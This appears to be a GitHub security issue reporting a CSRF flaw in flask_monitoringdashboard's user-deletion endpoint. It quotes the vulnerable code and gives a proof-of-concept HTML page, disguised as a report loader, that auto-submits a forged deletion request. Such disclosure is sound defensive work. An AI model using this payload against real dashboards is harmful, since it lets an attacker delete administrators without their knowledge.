Skip to content

CSRF Vulnerability in User Deletion (/api/user/delete) #558

Description

@flashzyc

CSRF Vulnerability in User Deletion (/api/user/delete)

Summary

A Cross-Site Request Forgery (CSRF) vulnerability exists in the dashboard user-deletion endpoint /api/user/delete. The lack of CSRF protection allows an attacker to force an authenticated administrator to delete dashboard users without authorization.

Vulnerability Details

Configuration-Level Issue

File: flask_monitoringdashboard/core/auth.py

def admin_secure(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        if session and session.get(config.link + '_logged_in'):   # ❌ cookie-only authorization
            if session.get(config.link + '_admin'):
                return func(*args, **kwargs)
        return redirect(url_for(config.blueprint_name + '.login'))
    return wrapper
# ❌ No CSRF protection anywhere in the package
# ❌ Session cookie has no SameSite attribute enforced

Endpoint-Level Code Analysis

File: flask_monitoringdashboard/views/auth.py (Lines 62-71)

@blueprint.route('/api/user/delete', methods=['POST'])
@admin_secure
def user_delete():
    """Delete the user in the database."""
    user_id = int(request.form['user_id'])
    # ❌ No CSRF token validation
    # ❌ No Origin/Referer verification
    if flask.session.get(config.link + '_user_id') == user_id:
        return jsonify({'message': 'Cannot delete itself.'}), BAD_REQUEST_STATUS
    with session_scope() as session:
        session.query(User).filter(User.id == user_id).delete()   # ⚠️ deletes user
    return 'OK'

Security Issues:

  1. ❌ No CSRF token validation
  2. ❌ No origin verification
  3. ⚠️ Deletes an arbitrary user (by user_id) based only on the session cookie

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Loading report...</title>
</head>
<body>
    <h2>📈 Generating your weekly report...</h2>

    <form id="csrf-form" action="http://127.0.0.1:5000/dashboard/api/user/delete" method="POST">
        <input type="hidden" name="user_id" value="2">
    </form>

    <script>
        setTimeout(function() {
            document.getElementById('csrf-form').submit();
        }, 1000);
    </script>
</body>
</html>

Impact

Unauthorized user deletion - An attacker can remove dashboard users (e.g. other
administrators), disrupting access and monitoring. Combined with ISSUE_01, an attacker
can delete legitimate admins after planting their own.


CVSS Score: 6.5 (Medium) — CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
CWE: CWE-352 (Cross-Site Request Forgery)


Reported by: flashzyc
Date: 2026-06-07

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Fields

    No fields configured for issues without a type.

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions